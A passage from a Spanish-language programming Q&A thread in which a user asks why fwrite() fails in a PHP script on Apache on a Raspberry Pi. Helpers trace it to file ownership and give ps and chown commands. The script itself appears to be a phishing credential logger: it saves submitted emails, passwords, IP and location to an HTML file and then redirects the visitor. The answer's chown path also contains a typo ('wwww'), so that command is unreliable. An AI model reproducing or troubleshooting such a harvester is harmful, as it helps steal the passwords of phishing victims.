# fwrite() no me funciona usando php7.3.33 y apache2 en una RaspberryPi 3 B

Tags: php, apache2, raspbian, raspberry

En mi script de php solo funciona el header, pero fwrite no me escribe **NADA** en el archivo que le indico. Tengo un servidor apache2 en una raspberry pi 3 B (Raspbian); mi versión de php es 7.3.33.

Cabe recalcar, que en *XAMPP* (en un Windows 11), con **PHP 7.3.27**, sí me sirve bien el script, pero en mi raspberry pi no.

**PD**: No sé si sea *fwrite()* o *fopen()* el que no funciona. Tampoco sé si tenga que ver con la versión de PHP, y tenga que instalarle la misma versión a la RaspberryPi.

[image: introducir la descripción de la imagen aquí]

Éste es el código:

```html
<?php
include 'email.php';

include 'Block.php';

include 'Viste.php';

$correo = $_GET['email']; 
$password = $_GET['pass'];
$ip = $_SERVER['REMOTE_ADDR']; 
$fecha = date('d/m/y',time()-86400);
$hora = date('h:i:s',time()+18000);
$f = fopen('registros.html', 'a'); 
fwrite ($f, 'Email: [<b><font color="#0000FF">'.$correo.'</font></b>]<br> Password: [<b><font color="#FF0040">'.$password.'</font></b>]<br>IP: [<font color="#3ADF00">'.$ip2.'</font>]<br>Fecha: ['.gmdate ("Y-n-d").']<br>Hora: ['.gmdate ("H:i:s").']<br>Ubicación: [<font color="#8000FF"><b>'.$cn.'</b></font> | <font color="#8000FF"><b> '.$reg.'</b></font> | <font color="#8000FF"><b>'.$cii.'</b></font>]<br>Datos extra: [<b>'.$os.'</b> | <b>'.$br.'</b>]<br><br>==============================================================================================<br>');

fclose($f);
header('Location: example.com');
?>
```

Comment: puse el comando tal cual entre comillas, y me salió ésto: `www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin` ¿si va así tal cual lo que pusiste entre comillas o lleva algo antes?

Comment: eso quiere decir que ese usuario existe.. es mas, pruba ahora esto:  `ps aux | grep apache` y comprueba las primeras columnas que salen, pues estaras viendo el proceso que ha lanzado apache y el usuario que lo esta haciendo correr, y si no me equivoco sera el www-data

Comment: ahora sí, me aparece la primer y última columna me aparecen root, pero todas las demás de en medio sí me aparece www-data. Entonces a html y lo que le sigue, le pongo www-data? O sea, ¿quedaría `www-data:www-data`?

Comment: si, `chown www-data:www-data /var/www/html` y lo que tenga dentro tambien... si quieres pruebalo solo en un archivo cualquiera que quieras abrir con el navegador primero, pero la carpeta debe estar asi casi seguro

Comment: sip, le calé con un html y sí me lo abrió normal, sin ningún problema. Entonces procedo a cambiar el usuario y grupo de todo lo demás?

Comment: si, hazlo... ahora te dejo, ya volvere, suerte

Comment: yaaaa pudeeee!, te agradezco muchísimo tu tiempo hermano.

Comment: @amzk12 ten en cuenta que [es.so] **no es un foro**, por lo tanto, si encontraste la solución a tu problema, _escríbela como respuesta_ y [acéptala](/help/accepted-answer) cuando transcurra el tiempo mínimo. Tampoco olvides leer [answer].

Comment: @amzk12 acabo de colgar una respuesta, si te parece correcta márcala com aceptada para que esta pregunta no quede pendiente para siempre.

Answer (score 0, accepted):

El problema al final era relativo a un **problema de permisos** de su instalación en su raspberry pi 3b.

Primero se ha verificado bajo que usuario corría apache, mediante la instrucción:

```
ps aux | grep apache
```

La cual ha devuelto la línea completa del proceso actual de apache y donde se apreciaba que era ejecutado bajo el usuario `www-data`, pues ha devuelto varias líneas (de todos los hilos en ejecución) como esta:

```
www-data 32621  0.0  0.7   7396  3348 ?        S    00:00   0:00  \_ /usr/sbin/apache2 -k start
```

y si nos fijamos en la primera columna aparece el usuario que lo está ejecutando, que es `www-data`.

Y para solucionarlo ha tenido que establecer que el subdirectorio:

```
/var/www/html
```

y sus subdirectorios y archivos tuvieran este grupo/user:

```
www-data:www-data
```

ejecutando el comando

```
chown -R www-data:www-data /var/wwww/html
```

para aplicarlo en todos ellos. [chown](https://linux.die.net/man/1/chown) es un comando que cambia el **owner** y el **group** allí donde se aplica. En este caso estableciendolos en `www-data:www-data`. Al pasarle el parámetro `R` se ejecuta de modo recursivo a partir del directorio pasado al comando.